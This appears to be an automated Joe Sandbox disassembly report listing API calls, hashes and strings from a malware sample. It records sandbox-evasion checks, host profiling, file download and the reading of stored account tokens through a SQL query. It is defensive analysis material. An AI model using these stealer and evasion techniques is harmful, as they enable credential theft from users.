                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                              • String ID: :$C$\
                                                                                                                                                                                                                                              • API String ID: 3790021787-3809124531
                                                                                                                                                                                                                                              • Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                              • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                              • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                              • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
                                                                                                                                                                                                                                              • String ID: '@$'@
                                                                                                                                                                                                                                              • API String ID: 1815715184-345573653
                                                                                                                                                                                                                                              • Opcode ID: 8b55da906079f4b7e2c67570a1be054e10abea7064ba0d58136f1bac8616076b
                                                                                                                                                                                                                                              • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b55da906079f4b7e2c67570a1be054e10abea7064ba0d58136f1bac8616076b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,040864A8,00000000,?,0041D774,00000000,?,00000000,00000000,?,040863E8), ref: 0041496D
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                              • String ID: %d MB$@
                                                                                                                                                                                                                                              • API String ID: 2886426298-3474575989
                                                                                                                                                                                                                                              • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                              • Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                              • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,04083B38), ref: 00405DE7
                                                                                                                                                                                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                                                                                                                                                              • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2507841554-0
                                                                                                                                                                                                                                              • Opcode ID: 33d80e034ad8f542e0ef5a467f467662f582e0545ae4ff6488c0ef396ccf234c
                                                                                                                                                                                                                                              • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33d80e034ad8f542e0ef5a467f467662f582e0545ae4ff6488c0ef396ccf234c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00413D9E
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00413E2A
                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00413F7E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                                                                                              • API String ID: 224852652-4138519520
                                                                                                                                                                                                                                              • Opcode ID: 58fa82f264080733bae1e7b8f01e14ae4a67fe3ffc4adbed189253538e0755ae
                                                                                                                                                                                                                                              • Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58fa82f264080733bae1e7b8f01e14ae4a67fe3ffc4adbed189253538e0755ae
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                              • API String ID: 2910778473-1079375795
                                                                                                                                                                                                                                              • Opcode ID: 7d4500fa2934594752666061c9df31e8c65c16c470467cd37b1ac9dbbd13c62c
                                                                                                                                                                                                                                              • Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d4500fa2934594752666061c9df31e8c65c16c470467cd37b1ac9dbbd13c62c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,04086448,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00414C9E
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,040866A0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 00414DA5
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                                              • API String ID: 3896182533-4073750446
                                                                                                                                                                                                                                              • Opcode ID: 531daa6300200cb92d5b1988fc21d9558b480b48c1d4f7758da1487724698403
                                                                                                                                                                                                                                              • Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 531daa6300200cb92d5b1988fc21d9558b480b48c1d4f7758da1487724698403
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411DA5
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,04086958,00000000,00020119,?), ref: 00411DC4
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,040866E8,00000000,00000000,00000000,000000FF), ref: 00411DE8
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00411DF2
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411E17
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,040873A8), ref: 00411E2B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2623679115-0
                                                                                                                                                                                                                                              • Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                              • Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04061DF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                                                                                                              • String ID: X@
                                                                                                                                                                                                                                              • API String ID: 3258613111-2850556465
                                                                                                                                                                                                                                              • Opcode ID: cd8ce6d40e5afa3ebb260d2b60027121d441955b8b015006d91c09b557981aa9
                                                                                                                                                                                                                                              • Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd8ce6d40e5afa3ebb260d2b60027121d441955b8b015006d91c09b557981aa9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,0406ADE0), ref: 00415F11
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,0406AD80), ref: 00415F2A
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,0406ADB0), ref: 00415F42
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,0406AA68), ref: 00415F5A
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04083720), ref: 00415F73
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04082AC0), ref: 00415F8B
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04068308), ref: 00415FA3
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04068028), ref: 00415FBC
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04083738), ref: 00415FD4
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04083768), ref: 00415FEC
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04083780), ref: 00416005
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04083750), ref: 0041601D
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,04068188), ref: 00416035
                                                                                                                                                                                                                                                • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(77190000,040836C0), ref: 0041604E
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
                                                                                                                                                                                                                                                • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                                • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                                • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                                • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                                • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                                • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                                • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                                • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                                • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                                • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                                                                                                                                                                • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04083828,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
